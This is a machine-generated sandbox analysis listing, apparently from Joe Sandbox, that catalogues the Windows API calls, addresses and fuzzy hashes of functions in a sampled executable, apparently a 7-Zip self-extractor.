                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                              • String ID:
                                              • API String ID: 359084233-0
                                              • Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                              • Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
                                              • Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                              • Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00414DD8
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00414F76
                                              • ??2@YAPAXI@Z.MSVCRT ref: 00415049
                                                • Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT ref: 0041536E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@$H_prolog
                                              • String ID:
                                              • API String ID: 3431946709-0
                                              • Opcode ID: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                              • Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
                                              • Opcode Fuzzy Hash: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                              • Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98
                                              APIs
                                                • Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                • Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                • Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404117
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040411F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404127
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                              • String ID:
                                              • API String ID: 1642057587-0
                                              • Opcode ID: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                              • Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
                                              • Opcode Fuzzy Hash: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                              • Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00415EEF
                                                • Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00415F9F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00415FDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@H_prolog
                                              • String ID:
                                              • API String ID: 1329742358-0
                                              • Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                              • Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
                                              • Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                              • Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: 8a9aa48f9070ee96bf63fde4069f08434787f301be68acc01994b4796d983c6a
                                              • Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
                                              • Opcode Fuzzy Hash: 8a9aa48f9070ee96bf63fde4069f08434787f301be68acc01994b4796d983c6a
                                              • Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D
                                              APIs
                                                • Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041821D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418381
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@$ExceptionThrow
                                              • String ID:
                                              • API String ID: 2803161813-0
                                              • Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                              • Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
                                              • Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                              • Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@??3@
                                              • String ID:
                                              • API String ID: 1936579350-0
                                              • Opcode ID: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                              • Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
                                              • Opcode Fuzzy Hash: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                              • Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 0041232E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                              • Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
                                              • Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                              • Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 13d222b830ec1b76ef9816a0e1a09f4c46f5c84433889d2432b754d55f7c65a6
                                              • Instruction ID: 702b7f6aa448c02f57ffbe3e90d00091742363f5759971e74b35482eb8e1e9bd
                                              • Opcode Fuzzy Hash: 13d222b830ec1b76ef9816a0e1a09f4c46f5c84433889d2432b754d55f7c65a6
                                              • Instruction Fuzzy Hash: E8016DB5540204DFD724DF16C8418EAFBE8EF91751B14859FE4468B361CBB8AA84CBA8
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 004134D2
                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                              • Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
                                              • Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                              • Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                              • Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
                                              • Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                              • Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59
                                              APIs
                                                • Part of subcall function 0041229A: FindCloseChangeNotification.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ChangeCloseCreateFileFindNotification
                                              • String ID:
                                              • API String ID: 727422849-0
                                              • Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                              • Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
                                              • Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                              • Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95
                                              APIs
                                              • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                              • Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
                                              • Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                              • Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                              • Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
                                              • Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                              • Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: _beginthreadex
                                              • String ID:
                                              • API String ID: 3014514943-0
                                              • Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                              • Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
                                              • Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                              • Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                              • Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
                                              • Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                              • Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                              • Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
                                              • Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                              • Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                              • Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
                                              • Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                              • Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: f79fff84bd0e040257a36252c66a406e8276e4d7bddcf747b47657c9f69a0d49
                                              • Instruction ID: 6fac46e23173c77b6da9288ddc2accfa11a1bb9d9b8ef9c94bf40dac47475653
                                              • Opcode Fuzzy Hash: f79fff84bd0e040257a36252c66a406e8276e4d7bddcf747b47657c9f69a0d49
                                              • Instruction Fuzzy Hash: C5C0123220C520974A15BE359400CCB73E4BF59310300484FE88993645D638BD814B9D
                                              APIs
                                              • SysAllocString.OLEAUT32(?), ref: 0040119C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: AllocString
                                              • String ID:
                                              • API String ID: 2525500382-0
                                              • Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                              • Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
                                              • Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                              • Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3221825180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.3221803848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3221960684.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222005633.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_jjjUC5ggb2nQMb1B6SvBkwmT.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                              • Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
                                              • Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                              • Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618
                                              APIs
